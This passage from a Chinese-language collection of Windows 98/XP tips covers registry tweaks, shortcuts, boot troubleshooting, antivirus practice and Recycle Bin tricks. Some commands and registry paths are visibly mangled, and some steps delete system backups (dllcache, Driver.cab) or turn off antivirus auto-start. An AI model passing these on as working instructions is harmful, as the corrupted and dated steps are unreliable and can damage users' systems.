2)、删除驱动备份,删除WINDOWS(XP安装目录)\driver cache\i386目录下的Driver.cab文件

3)、删除DLL备份文件,目录为WINDOWS(XP安装目录)\system32\dllcache,

4)、删除WINDOWS(XP安装目录)\ime下不用的输入法

100.让IE使用多线程下载网页:注册表子键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings,
新建DWORD值.
“MaxConnectionsPerServer”,此项的作用是决定最大同步下载的连线数目,一般5~8
个连线数目比较好。另外,对于HTTP 1.0服务器,可以加入名为“MaxConnectionsPer1_0Server”的双字节值项,其值也是设置最大同步下载的数目。


101.到微软站点下载Bootvis.exe文件,启动它,
依次选择菜单里面的Trace Optimize System,这时候系统会提示是否重新启动,选择启动,重启登录以后什么都别动,过一段时间会自动弹出一个对话框,对话框上写着系统分析的意思,你什么都别做,要一直等到提示分析完毕以后才能够操作你的系统,分析时间有点长,请耐心等待。


102.桌面图标的小箭头去除
首先,单击“开始”按钮,选择“运行”,在运行对话框中键入regedit后回车,即可进入注册表编辑器,选择HKEY_CLASSES_ROOT\lnkfile,在右边的窗口中找到字符串值“isshortcut”,按DELETE键将其删除。然后,仍在HKEY_CLASSES_ROOT \ 下找到piffile,同样在其右边窗口中将字符串值“isshortcut” 按 DELETE键将其删除。最后,关闭注册表编辑器,重新启动WINDOWS,那个烦人的小箭头已经没有了。


103.如果同时有多个窗口打开,想要关闭的话,可以按住shift不放然后点击窗口右 上角的关闭图标.

104.在保存网页前,可以按一下ESC键(或脱机工作)再保存,这样保存很快

105.用电脑听CD可以不用任何的播放软件,把音箱线直接接到光驱的耳机孔,放入 CD,按光驱上的play键就可以直接听了,这样听歌可以不占用系统资源。(如 果你的电脑坏了,不能启动或什么的,一时放在那不能修,千万不要浪费资源 ,把用里面的电源给光驱通上电,就可以暂时做CD机了.

106.MSN中发消息的时候是按enter的,如果想要换行而不想发出消息,可以 shift+enter或ctrl+enter

107.浏览器的地址栏里可以调试简短的HTML代码。方法如下: 地址栏写 about :abc 回车,就看到效果了.

108.Windows快捷键:
win+m 显示桌面
win+pause 系统属性
快速重新启动:按确定前先按shift(不适用于2k、xp).
彻底删除:shift+del
不让光盘自动运行:按shift
Ctrl+Esc:相当于开始或WIN键
Ctrl+Home:将游标移至文字编辑区的开始始(Home单用:移至列首)
Ctrl+End:将光标移至文字编辑区的终点(End单用:移至列尾)
Alt+F4:关闭当前视窗(若是点一下桌面再按则为关机)
F2:更改名称
windows+e 资源管理器.
windows+r 运行.
windows+f 查找.
windows+u 关闭系统.
windows+d最小化所有窗口,再按一次Win+D可回到最小化前的窗口.
windows+m最小化所有窗口,但再按一次无法回到最小化前的窗口.
Shift+F10,可以打开所选项目的右键菜单.
按住 CTRL+SHIFT 拖动文件:创建快捷方式.

109.RUN - > cmd 或者command
就会看到DOS窗口。不知道大家注意到那个小小的图标没有,在左上角。 点击这个图标, 就会看到下拉菜单, 尤其是Edit下的一些功能, 很方便

110.con、nul是MS系统的保留名,它不能做为文件名!检查你的web空间是不是M$ 系统,可以建一个con的文件夹试试

111.想把自己的某个文件夹的文件做一个列表? 用什么软件呢? 不用,直接在命令 行下输入 tree /f > index.txt.打开index.txt看一下是不是一目了然

112.保存无边窗口页面请用CTRL+N新开窗口

113.如果一个文件夹下有很多文件,如果想快速找到想要的文件,先随便选择一个 文件,然后在键盘上选择想要的文件的第一个字母就可以了

114.说个QQ隐身登陆的笨办法:
在网吧上网,如果直接从注册向导登陆的话QQ是上线登陆的,可是有时候却不 希望现身,怎样实现隐身登陆呢? 就是拿一个没用的QQ先从注册向导登陆了,选择状态为隐身,然后在系统参数 中选中以隐身方式登陆,点确定,然后直接在这个QQ上运行注册向导登陆你要 登陆的QQ,你会发现现在QQ是隐身的了。

115.win98改ip不重启的办法:
1.改完ip选择取消。
2.在设备管理器里禁用改了ip的那块网卡。
3.启用网卡。
ok,你改的ip已经可以用了

116.2000和xp下运行cmd,进入dos窗口,复制和粘贴都用右键完成

117.收藏夹不要放在系统盘,以免忘了备份,每次装完系统用超级魔法兔子“指 定路径

118.对于系统不明白的地方,平时多看windows自带的帮助,不要盲目去找人解决 ,也许帮助才是最快和最全的。(其余软件也是同理)

119.winxp自带批量重命名功能,只要选中一堆文件,选重命名,然后改第一个文 件,改完后,其他文件也会自动修改

120.上网时在地址栏内输入网址,系统会记录下来,虽然方便以后不用再重复,不 过如果是公用的机子,又不想让别人知道自己到过哪些地方,可以用“CTRL+ O(字母O,不是0)”,这时对弹出一个“打开”对话框,在其中的地址栏内 输入网址,就不会被记录下来了.

Ctrl+W关闭窗口
F4打开地址拦的下拉选择网址
F6或ALT+D选择地址拦
空格键可以下翻页,Shift+空格则可以上翻页

122.如果你用foxmail,邮箱路径不在默认位置,可以修改account.cfg

123.NTFS分区上文件属性中有个“摘要”功能,很有用的,这样一些软件安装程序 是什
么东东就不会忘了啊!

124.在IE的地址栏输入: javalert(文档.lastModified)可以得到网 页的更新曰期.

125.通过网络共享时,尽量使用运行,\ip地址共享文件名,而不要使用通过 “网上邻
居”浏览访问,速度很慢,而且经常不全(特别是2000,xp),还要 注意适当的运用$

126.在98下快速做启动盘,只要把windows/command/edb下的所有文件复制到干净 的软盘中就可以做98启动盘

127.运行pq分区失败,出现不可识别的分区,只要找到pq安装目录UTILITY的 PTEDIT32.EXE,可以把原分区还原为原来格式. 打开资源管理器,选中文件夹,用小键盘的*,可以把这个文件夹中的所存在的 所有子文件夹迅速列出

128.QQ自己加自己的方法:在黑名单中加自己,然后再把自己拖到我的好友中就可 以了,然后再运行注册向导.

129.如果浏览的页面中应用了java脚本禁用了鼠标右键,解决的方法:
1、如“xiayupei”的方法,先按住鼠标左键,然后将鼠标移动到目标处,点击 鼠标右键,一两秒之后,快捷菜单出现.
2、单击鼠标右键,(不要放开鼠标右键),将鼠标移到警告窗口处,点击鼠标 左键,关闭窗口,再将鼠标移回目标处,放开鼠标右键,快捷菜单出现.

130.realplay多曲播放.
选中多个曲目,然后拖到realplay 的播放地址栏就可以了,之后找到那个ram(会 自动生成),复制里面的内容多遍就可以反复听歌曲.

131.windows下文件可以只有扩展名 新建一个文本文档另存为.txt.前面什么也不要加,就可以了,但是你不能重 命名为这样的文件名!要用另存为!

132.IE真正的空白页:
在IE的快捷方式中右击---属性--选择“目标”,这里的信息为:“ crogram FilesInterner ExplorerEXPLORER.exe,在它之后添加“ -nohome字样即可。注意-nohome之前要有空格 快速设置主页:将IE地址栏里的“e”网页图标直接拖到工具栏上的“主页” 按钮图标上 不用重启也刷新注册表:同时按Ctrl+Alt+Del,在弹出的Windows任务列表中加 亮Explore,单击“结束任务”,显示关机屏幕,单击:“否“,稍候,弹出 错误信息,单击“结束任务”,windows游览器即会和新和注册表一起重新装载!

133.快速启动RealOnePlayer的技巧:在Real的文件夹下搜索netid.smi和 getmedia.ini
将其改名为:betid_bak.smi和getmedia_bak.ini,然后再打开 试试,是不是快很多.

134.跳过开机画面
启动时按 esc 即可,或者干脆一点,修改 msdos.sys在options段落加入 logo=0

135.创建浏览目录的快捷方式
在桌面上创建一个快捷方式, 命令为:C: WINDOW***PLORER.EXE /n,/e,C:当你双击此快捷方式时,将会用“Windows资源管理器”浏览C:。 当然,你可以用其他的目录名来替换命令中的C:

136.改变关机画面: 
记得以前可以改变开机画面吧,现在可以对关机画面动手喔!logow.sys 是等 待关机,logos.sys 是最後丑丑的 您可以安全关机^_^都是 bmp 档,快动手 吧,原图是 320x400 , 256色!但是最後win95会把他放宽170%所以你可以先准 备一张 544x400 的图 再把这张图 resize 成320x400 再 rename 一下档名 就可以啦!(只能 256色喔 )而且最好注意一下色盘的问题*开机画面也可以 喔!logo.sys....

137.这个 .exe 用了哪些 .dll? 对应用程式右键单击,选 快速检视
笔者注快速检视必须另行安装,方法如下:a. 控制台/新增或移除程式/ Win95 安装程式 /
附属应用程式/详细资料!b. 核取快速检视方块--确定

138.厌倦图形介面了吗 想念以前先进入 dos 在打 win 进窗户吗在 msdos.sys 中加入这一行BootGUI=0

139.在 win95的MS-DOS下使用长文件名
只需要在文件名前后加引号()即可。如:
c:>dir windows utilities
c:>cd windows utilitiesinsteasy
c:>edit The list of my friends.txt

140.加快软驱传输速度
  往软盘上存贮较多资料时,让人等得真有点烦。我们不可能对软驱的机械结构 进行改造,但可以通过修改系统注册表以获得较高的数据传输速度,具体方法 如下:
打开系统注册表编辑器,找到 “HEKY-LOCAL-MACHINESystemCurrentControlsetServicesClassFCD00 ,在其右边的窗口空白处,占击鼠标的右健新建一个“DWORD”值,命名为 “ Fore-Fifo”,健值设定为“0”。 最后关闭注册表面化编辑器,重新启动电 脑,一切就OK了!

 

《桌面管理界面》

DMI是英文单词Desktop Management Interface的缩写,也就是桌面管理界面,它含有关于系统硬件的配置信息。计算机每次启动时都对DMI数据进行校验,如果该数据出错或硬件有所变动,就会对机器进行检测,并把测试的数据写入BIOS芯片保存。所以如果我们在BIOS设置中禁止了BIOS芯片的刷新功能或者在主板使用跳线禁止了BIOS芯片的刷新功能,那这台机器的DMI数据将不能被更新。如果你更换了硬件配置,那么在进行WINDOWS系统时,机器仍旧按老系统的配置进行工作。这样就不能充分发挥新添加硬件的性能,有时还会出现这样或那样的故障。

 

如果我们在启动计算机时看到上述这个信息后,系统长时间停止不前或处于死机状态,对于机器此类故障一般很难处理。因为不能像进入系统后出现的故障,我们可以检查系统日志之类的文件进行分析。不过,根据PC机启动的过程原理分析,出现这条信息时一般有以下的可能情况:

1.硬件改变

  当主机的硬件配置有所变化,但是我们使用的是POST功能时,此时系统不能识别新添加的硬件,将会按老的配置进行工作,此时就会出现开机后能够加电,但是没有正常启动时“嘀”的一声,同时显示器也没有图像显示,只有风扇转动的声音。

  还有一个原因是新添加的硬件的兼容性不好,导致上述的情况出现。

  2.BIOS设置改变

  当BIOS设置错误时,比如内存的读写参数设置有误,硬盘的模式设置有误,板载声卡与集成声卡的设置有误等情况,都会造成不能正常启动。

3.硬盘线连接错误

  这类情况有硬盘的数据线接触不良,数据线质量低劣造成数据数输时错误太多,数据线插接有误(接主板端与接硬盘端倒个儿),主从硬盘跳线有误,硬盘容量或模式设置有误等。

  4.硬盘主引导区内容被破坏

  当硬盘的主引导区内容被其他程序改写或被病毒破坏掉,也可能时硬盘分区表被清除或人为的设置成逻辑锁状态时,就会到此时死机。

  对于硬盘的主引导区的引导程序被破坏,我们可以使用Fdisk/MBR命令进行修复,或者使用KV3000的磁盘编辑功能查找0道0面的其他62个扇区是否有备份的主引导区程序,将其还原至0道0面0区即可。

  对于分区表被破坏的就比较麻烦。如果只是分区表没有“80”标志或者多个“80”标志,或者没有”55AA”标志的,我们只要使用KV3000的磁盘编辑功能进行手动修复就可以了。如果是逻辑锁,就需要制作特殊的磁盘进行解锁。如果分区表被完全破坏或者被加密,那我们就只能重新分区了。

  5.硬盘有故障

  现在硬盘的容量越来越大,速度越来越快,不过硬盘的质量好像也越来越差了。到目前市场上还有94,95年份生产的几百M的二手硬盘在卖呢。可现在呢,刚买的新硬盘,没几天就会坏道成片或者莫名妙的丢失数据,再不就是“咣咣”的提意见罢工不干了。当硬盘硬件出现故障时,也会出现上述的情况,此类问题硬盘在CMOS里能够认到硬盘,认盘很顺利,但就是进不了系统,无法正常分区和格式化。

  6.主板有问题

  与主板有关的也主要是主板的硬盘控制器的问题,造成数据传输不稳定,错误率太高。

7.超频造成的损坏

  如果我们超频过头时,也会出现开机后到硬盘这儿就死机。这时我们最好住开机自检时显示的CPU的频率是多少,再打开机箱检查实际CPU的频率是多少,二者是否相同。特别对于PIV以后的CPU,其集成度极高,如果我们超频使用,极有可能造成CPU内部的电子在短时间内过度衰减,导致CPU短时间内报废。

解决的方法:

  1.恢复硬件改变前的状态,检查系统是否能够正常启动。

  2.检查所有连接线或扩展卡是否正确连接。

  3.试着重新配置在BIOS中“PNP/PCI configuration”“Reset Configuration Data”也可以使用“Force Update ESCD”之类的BIOS选项设置为“Enabled”,然后存盘退出。如果能够不能启动,再试着设置为“Disabled”试一试。

  4.查阅主板手册关于CMOS跳线的的信息并清除CMOS。请注意:在清除CMOS设置时必须拔掉主机电源线或者把主机电源的开关设置为off或0。

  5.断开硬盘连接线,包括光驱或其他IDE设备,再进入BIOS设置选择启动顺序为软盘启动后按F10存储退出,然后在软驱中放入一张可启动的系统盘,检查系统是否能够正常启动。

  6.在完成清除CMOS设置后,把CMOS设置中的“PNP/PCI configuration”选项设置为“Enabled”,再次重新启动电脑来更新设置DMI数据,也叫做强制更新ESCD数据。

  7.如果主机能够通过软盘启动,但是不能通过硬盘启动,这种情况有可能是硬盘的主引导区的数据被破坏,这时可以通过分区软件来修复主引导区的程序代码,如用软盘启动电脑后,使用FDISK/MBR命令来修复主引导区。也可以到相应硬盘生产商的网站下载特殊的硬盘分析工具程序,来检查自己的硬盘的具体故障。

  8.如果经过上述设置后还不能排除故障,这时应考虑是主板或硬盘的IDE接口的问题,可以通过替换法解决。 

《几种常见的杀毒方法》

几种常见的杀毒方法

 

有过网吧或者机房管理经验朋友肯定知道,如果机子中了病毒的话是很让人头疼的事情,现在的病毒大多都具有复制能力特别强,能够通过局域网传播,大量耗费系统资源等特点,一个局域网内只要有一台机子中了病毒,如果不及时的杀毒和隔离的话,其他的机子很快便会感染病毒,如何防止病毒,和快速的杀毒成了每个网管所迫切考虑的事情。

  其实网吧内的常见的病毒有两种,一种是类似与CIH的病毒这种高破坏性的病毒,中了之后系统会无法启动,这种病毒的危害大,但是中毒的几率相对很少;另一中就是脚本病毒。这类病毒一味的耗费系统资源,直到系统崩溃死机,比起CIH病毒来说,它们看似很不起眼,但却做让人头疼。有没有克制脚本病毒的方法呢?笔者在实践中总结了以下几条经验。

  第一,装系统的时候要用光盘启动硬盘来装,光盘要保证以前用过的没有携带病毒的,硬盘一定要没有任何文件,否则残留的文件里面很可能就感染了病毒,这一点一定要毫不留情,不要为了要备份一个驱动或者一个软件不把它删除。否则你刚装完系统发现已经中了病毒,那可就后悔莫及了。

  第二,装完系统后,再装驱动之前,最好先用装个杀毒软件,杀毒软件首先要保证自己没有病毒,其实你可以把WIN98安装文件,杀毒软件等,网吧机器的驱动放在一起用EasyBoot做个启动光盘。有了这张盘,你在装其他软件和游戏之前就可以保证母盘不感染病毒了。

  第三,装好驱动后先上网把杀毒软件更新到最新,然后开着病毒防火墙,从事先准备好的机器上调用软件和游戏的安装文件来安装网吧的必备软件和常玩的游戏,一切都弄好后测试一遍游戏和软件,然后在C盘目录下建立一个ADMIN的文件夹,把专杀工具包,硬盘工具包,网络克隆工具,还有备份的注册表放到里面备用。一般样板盘做成这样就很好了,当然如果系统配置不高,为了不影响玩游戏的速度,在克隆完之后要把病毒防火墙的自启动取消。

  装杀毒软件不是让它老开着防火墙,因为一来它耗费系统资源,二来平时安装着还原精灵,有病毒重启一下就好了,它主要用在以后升级游戏或者调用文件的时候把防火墙打开防止调用文件中的病毒感染系统,更何况人非圣贤,孰能无过,再谨慎的人也不会保证以后肯定不会出病毒,所以一定要为每台机子装上杀毒工具,但平时没必要启用它的保护功能。

  在网络上的人肯定都中过爱情森林,新欢乐时光等这些顽固的病毒,尤其是在局域网里,往往是所有的机子都感染病毒,每个机子能杀出几百个到上千个病毒,我曾经在一台机子上用瑞星杀出过8000多个病毒。

  这些病毒非常恶劣,一般在WINDOWS下是不容易杀干净的,每次杀完病毒,紧接着再杀的时候就会发现杀毒软件本身还有EXPLOR.EXE等进程依然感染着病毒,你无论怎么杀也杀干净,这样的话最好是重起到安全模式下再杀,杀毒的时候不要打开任何的窗口,因为有些病毒只要你打开窗口就会激活,它占用到内存的话就很难清除了。杀完后重起再进安全模式再杀,一般这样几次病毒就会杀干净了。如果还不行的话就要到DOS下查杀了,一般的杀毒软件都有它的DOS版本。重启动到纯DOS模式下,跳转到安装目录下运行那个程序会有个提示,不过这样查杀病毒的速度一般很慢。值得注意的是如果所有的机子都中了病毒的话,一定要把交换机关掉一台一台的杀,杀完后备份C盘,并用保护卡保护起来。

  脚本病毒这样清除就可以了,但是对于CIH等病毒来说,除了杀完毒后还有做恢复工作,一般来说它就是破坏分区表和主引导程序,严重的话破坏BIOS。我们可以分别来对待,如果损坏的仅仅是主引导记录,可以用干净的启动软盘或光盘启动系统运行fdisk /mbr就可以了,也可以用DISKMAN,DISKGEN等小工具来重建主引导记录。如果损坏的是分区表,首先考虑的是用DISKMAN的恢复分区表功能,破坏的不太严重的话一般可以恢复的。不过,如果你对磁盘结构,分区表,I/O表,FAT表不熟悉的话,笔者还是建议专业人员来修理好些,毕竟这样安全系数更大。 

《老虫的电脑维护心得》

老虫的电脑维护心得
1、定期整理硬盘
  严重的硬盘碎片会大幅度降低你的电脑响应速度。所以你就需要定期的对磁盘进行清理,磁盘清理非常简单,首先单击“开始”,依次指向“所有程序”、“附件”、“系统工具”,然后单击“磁盘清理”。如果有多个驱动器,会提示您指定要清理的驱动器。
一、释放磁盘空间
  通过释放磁盘空间,可以提高计算机的性能。磁盘清理工具是 Windows 附带的一个实用工具,可以帮助您释放硬盘上的空间。该实用工具先标识出可以安全删除的文件,然后允许您选择希望删除部分还是全部标识出的文件。  
  磁盘清理工具功能:
  •删除 Internet 临时文件。
  •删除下载的程序文件。
  •清空回收站。
  •删除 Windows 临时文件。
  •删除不使用的可选 Windows 组件。
  •删除已安装但不再使用的程序。
  提示:通常情况下,Internet 临时文件会占据大多数的空间,因为为了加速以后的访问,浏览器会缓存您访问的每个页面。
  使用磁盘清理工具
  1.单击“开始”,依次指向“所有程序”、“附件”、“系统工具”,然后单击“磁盘清理”。如果有多个驱动器,会提示您指定要清理的驱动器。

 

“磁盘清理”工具计算您可以释放的磁盘空间量
  2.在“(驱动器)的磁盘清理”对话框中,滚动查看“要删除的文件”列表的内容。

选择要删除的文件
  3.清除不希望删除的文件所对应的复选框,然后单击“确定”。
  4.提示您确认要删除指定文件时,单击“是”。
  几分钟之后,该过程完成,“磁盘清理”对话框关闭,这时您的计算机更干净、性能更佳。
二、加快数据访问速度
  磁盘碎片会降低系统的整体性能。如果文件存储在不同的碎片上,那么打开文件时,计算机必须搜索硬盘,以便将碎片重新拼凑在一起。响应时间可能明显变长。
  磁盘碎片整理程序是一个 Windows 实用工具,用于合并计算机硬盘上存储在不同碎片上的文件和文件夹,从而使这些文件和文件夹中的任意一个都只占据磁盘上的一块空间。将文件首尾相接整齐存储而没有碎片时,磁盘读写速度将加快。
  何时运行磁盘碎片整理程序
  除定期(最好每月一次)运行磁盘碎片整理程序外,在通常每月一次的惯例之外,如果发生了某些特定的事件也可以运行该实用工具。
  在以下情况下,应该运行磁盘碎片整理程序:
  •增加了大量文件。
  •只有 15% 左右的可用磁盘空间。
  •安装了新程序或 Windows 的新版本。
  使用磁盘碎片整理程序:
  1.单击“开始”,依次指向“所有程序”、“附件”、“系统工具”,然后单击“磁盘碎片整理程序”。

单击“分析”将启动磁盘碎片整理程序
  2.在“磁盘碎片整理程序”对话框中,单击要对其进行碎片整理的驱动器,然后单击“分析”按钮。
  分析完磁盘之后,将显示一个对话框,告诉您是否应该对所分析的驱动器进行碎片整理。
  提示:对卷进行碎片整理之前,应该先进行分析,以便了解碎片整理过程大概需要多长时间。
  3.要对选定的一个或多个驱动器进行碎片整理,请单击“碎片整理”按钮。
  完成碎片整理之后,磁盘碎片整理程序将显示整理结果。
  4.要显示有关经过碎片整理的磁盘或分区的详细信息,请单击“查看报告”。
  5.要关闭“查看报告”对话框,请单击“关闭”。
  6.要关闭磁盘碎片整理程序实用工具,请单击窗口标题栏上的“关闭”按钮。
三、检测和修复磁盘错误
  除运行磁盘清理工具和磁盘碎片整理程序来优化计算机性能外,还可以运行错误检查实用工具来检查硬盘上存储的文件的完整性。
  在使用硬盘驱动器时,可能会出现坏扇区。坏扇区会降低硬盘性能,有时还会导致难以甚至无法执行数据写入操作(如文件保存)。错误检查实用工具可以扫描硬盘驱动器中是否存在坏扇区,并扫描文件系统错误以了解是否某些文件或文件夹放错位置。
  如果每天都使用计算机,那么应尝试每周运行一次此实用工具,以帮助您防止数据丢失。
  运行错误检查实用工具:
  重要: 运行错误检查实用工具之前,确保关闭所有文件。
  1.单击“开始”,然后单击“我的电脑”。
  2.在“我的电脑”窗口中,右键单击要搜索是否存在坏扇区的硬盘,然后单击“属性”。
  3.在“属性”对话框中,单击“工具”选项卡。
  4.单击“开始检查”按钮。
  5.在“检查磁盘”对话框中,选中“扫描并试图恢复坏扇区”复选框,然后单击“开始”。

大多数情况下,请选中“扫描并试图恢复坏扇区”
  6.如果发现有坏扇区,请选择进行修复。
  提示:如果认为磁盘包含坏扇区,请仅选中“自动修复文件系统错误”复选框。
2、定期清理Windows注册表
  防止注册表垃圾使用Registry First Aid这类工具。不要使用Outlook Express,它把垃圾邮件过滤器存放在注册表中。注册表的清理工具网上有很多,笔者给大家推荐两款注册表吸尘器和RegClear。但是有一点,清理前必须先备份注册表
3、尽可能不用"管理员"账户登录
  不要总用"管理员"账户登录,尤其是从外部向你的PC中拷贝文件的时候。如果你只是用普通权限的用户登录,大多数恶意软件都不能得逞。创建一个受限帐户很简单,就不需要一一介绍了吧,在控制面板的“用户帐户”下就可以创建了。
4、保持杀毒的更新
  恶意软件经常在注册表中制造垃圾,还会启动不必要的Windows服务,做许多降低系统性能的事情,甚至导致系统根本无法工作
5、使用专业清理软件如优化大师、超级兔子等对垃圾文件进行清理
垃圾文件的类型
a.软件安装过程中产生的临时文件
许多软件在安装时,首先要把自身的安装文件解压缩到一个临时目录(一般为Windows文件夹下的Temp目录)然后再进行安装。如果软件设计有疏忽或者系统有问题,当安装结束后,这些临时文件就会变得并不“临时”,成为硬盘里的一堆垃圾,很多时候它们以*.tmp的面孔出现。
b.软件运行过程中产生的临时文件
和安装过程一样,在软件的运行过程中通常也会产生一些临时交换文件,有些软件运行过后遗留下来的垃圾甚至多达数百兆,比如一些程序工作时产生的形如*.old、*.bak这样的备份文件,杀毒软件或系统软件检查硬盘时生成的备份文件等。
c.软件卸载后的遗留文件
由于Windows的反安装机制实在让人无法恭维,再加上多数软件都使用了动态链接库(DLL),而其中一些软件的设计还不太成熟,导致了很多软件“请神容易送神难”。当这些软件被卸载后,经常会在硬盘中留下一些文件夹、*.dll文件以及形形色色不知名的小东西,成为名副其实的垃圾。
在现实生活中,有很多初学者往往会错误地使用直接删除文件夹的方法“卸载”软件,这样就会留下更多无效的类似*.ini、*.dll这样的文件。同时还会在注册表中残存大量废弃数据,对系统的稳定造成更大影响。
d.上网冲浪产生的临时文件
我们在上网的时候,浏览器总是将网页文件下载到本地机器上,这些缓存文件不但占用了宝贵的磁盘空间,还常常会把我们的个人隐私公之于众,是可忍,孰不可忍。
e.一些不常用的鸡肋文件
比如一些应用软件自带的帮助或教程文件(常以.hlp等作为后缀),操作系统中多余的字体文件等。既然食之无味索性也将它们视作垃圾文件的一种表现。比如大量的字体文件不仅身体肥壮,占用空间甚大
6、硬件维护:保持每天都清洁硬件,避免灰尘引起的硬件故障 

《回收站里暗藏的小秘密》

 
“回收站”里暗藏的小秘密

★ 巧用“回收站”的“编辑”菜单

如果要删除“回收站”中的大多数文件,不用费劲地将它们一一选中,可以首先选中不删除的文件;然后单击“编辑”→“反向选择”,则系统将选中需要删除的文件;最后单击“文件”→“删除”即可。

★ 扩充“回收站”的鼠标右键功能

打开“注册表编辑器”,在键值[HKEY_CLASSES_ROOT/CLSID//ShellFolder]中修改Attributes的值,因为文件通常分为只读、隐含、系统和文档四种属性,每种属性对应一个数字,如果想让文件具有多种属性,只需将数字进行相加组合即可。其中:01:复制,02:剪切,03:复制和剪切,10:重命名,20:删除,30:重命名和删除,40:属性,50:重命名和属性,60:删除和属性,53:复制、剪切、重命名、属性,63:删除、属性、复制、剪切,73:重命名、删除、属性、复制、剪切。

★ 删除桌面上的“回收站”图标

打开“注册表编辑器”,在键值[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/explorer/Desktop/NameSpace]中,删除。

★随意删除与恢复文件

在“回收站”中选中文件,然后点击“还原”按钮,文件只能还原至被删除时所在的文件夹;而使用鼠标拖动它至任意文件夹中,则可以快速地将它恢复至该文件夹下。同样,如果想快速删除文件,只要将它们拖至“回收站”中即可。

★快速找到误删除文件

删除的文件多了,不知道该恢复哪一个,一般情况下要恢复的文件都是最近删除的,因此进入“回收站”,右击鼠标,选择“排列图标”→“按删除日期”,文件将按照删除的日期一一排列,这样就可以快速找到需要恢复的文件了。

★快速删除“回收站”中的文件

在DOS下可以快速删除“回收站”里的文件:启动MS-DOS,通过CD命令进入C:\RECYCLED目录;键入deltree/y *.* >nul,即可快速将C:\RECYCLED目录中的所有文件删除。

★妙用“回收站”实现批量重命名

删除要改名的文件,在D盘建立一文件夹如:ren,在DOS模式下进入Recycled目录,键入COPY *.* D:\ren,所有的文件已全改为DD1、DD2……注意:删除之前要先清空“回收站”,否则文件将有可能从100以上的数字基数开始。

★改变“回收站”的图标

打开“注册表编辑器”,找到[HKEY_CLASSES_ROOT\CLSID\\DefaultIcon],要更改回收站默认图标:“默认”=带路径的自定义图标文件名;要更改回收站空时的图标:“Empty”=带路径的自定义图标文件名;要更改回收站满时图标:“Full”=带路径的自定义图标文件名。

★使回收站不能清空

打开“注册表编辑器”,找到[HKEY_CLASSES_ROOT\CLSID\\InProcServer32],将“默认”改为“shell32.dll-”。

★不显示删除确认对话框

每次删除文件时总会弹出确认删除的对话框,若嫌麻烦可这样做:右击“回收站”图标,单击“属性”,清除“显示删除确认对话框”复选框中的标记,确认并退出即可。如果已选“不将文件移动到回收站”,则此项设置无效。

★利用“回收站”给文件加密

右击“回收站”,单击“属性”,选择“启用缩略图查看方式”,按“应用”后去除“只读”属性,按“确定”;打开“Recycled”文件夹,复制其中的“desktop.ini”文件到需要加密的文件夹下;右击该文件夹,单击“属性”,选择“启用缩略图查看方式”,按“确定”即可。

★改变“回收站”的名称

打开“注册表编辑器”,在键值[HKEY_LOCAL_MACHINE\Software\CLASSES\CLSID\]中,改变“默认”项的值即可。

★巧妙隐藏“回收站”

先用图标编辑器生成一个透明的图标,或者用绘图软件绘制一幅和图标差不多大小的bmp格式的透明位图,然后把这个透明图标或透明位图作为“回收站”的图标。最后一步是给它取个透明的名字,在这里我们要采用当年DOS下的惯伎,在输入回收站名字时,按下Alt键,然后在小键盘上按255,这就获得了一个透明的名字。现在你的回收站不见了,但它确实还在那儿,双击原来位置就可以打开回收站。

★“回收站”的另类用途

为满足我们的创造欲,还可以在回收站的右键菜单中添加自己喜欢的东西。这里以添加Windows自带游戏“红心大战”为例说明:打开“注册表编辑器”,找到[HKEY_CLASSES_ROOT\CLSID\ ]。单击{645FF040- 5081-101B-9F08-00AA002F954E}主键,在其下新建一主键,命名为 “Shell”,如果有则不用建立。单击“Shell”主键,在其下建一主键“红心大战”。单击“红心大战”主键,在其下再新建一主键“command”,修改其“默认值”为“C:\WINDOWS\Mshearts.exe”。

★随时随地都能“清空回收站”

清空回收站时,你是否每次都回到桌面呢?下面我们对它稍微改动一下就可实现随时随地通过右键菜单来清空回收站。打开“注册表编辑器”,找到[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers]。 在ContextMenuHandlers主键下新建一名为{645FF040-5081-101B- 9F08-00AA002F954E}的主键即可。

 

《WinXP最新操作技巧》

不为人熟知 WinXP最新操作技巧

 

微软的Windows Vista今年还发布不了,虽然我们使用Windows XP操作系统已经要满五年了,很多功能我们都熟得不能再熟了,但是人无完人,总有你不知道的技巧,比如下面介绍的这些。本文我们就给大家介绍一些不为人熟知的Windows XP操作技巧。

禁止修改“我的图片”的硬盘路径

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“DisableMyPicturesDirChange”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

不显示“我的图片”选项

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoSMMyPictures”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

禁止修改“我的音乐”的硬盘路径

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“DisableMyMusicDirChange”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

不显示“我的音乐”选项

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoStartMenuMyMusic”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

禁止修改“我的文档”的硬盘路径

禁止修改“我的文档”的硬盘路径启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“DisablePersonalDirChange”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

又或可透过群组原则来将达到目的,方法:

先以系统管理员的身份登入,到“开始”-->“运行”,键入“gpedit.msc”进入群组原则的设定,在“本机计算机原则”下打开“使用者设定”-->“系统管理模板”-->“桌面”-->禁止使用者变更“我的文档”路径便可。

不显示“我的文档”选项

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoSMMyDocs”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

限制“我最近的文档”显示的数目

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“MaxRecentDocs”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

不显示“我最近的文档”选项

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoRecentDocsMenu”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

停用“安全地删除硬件”项目

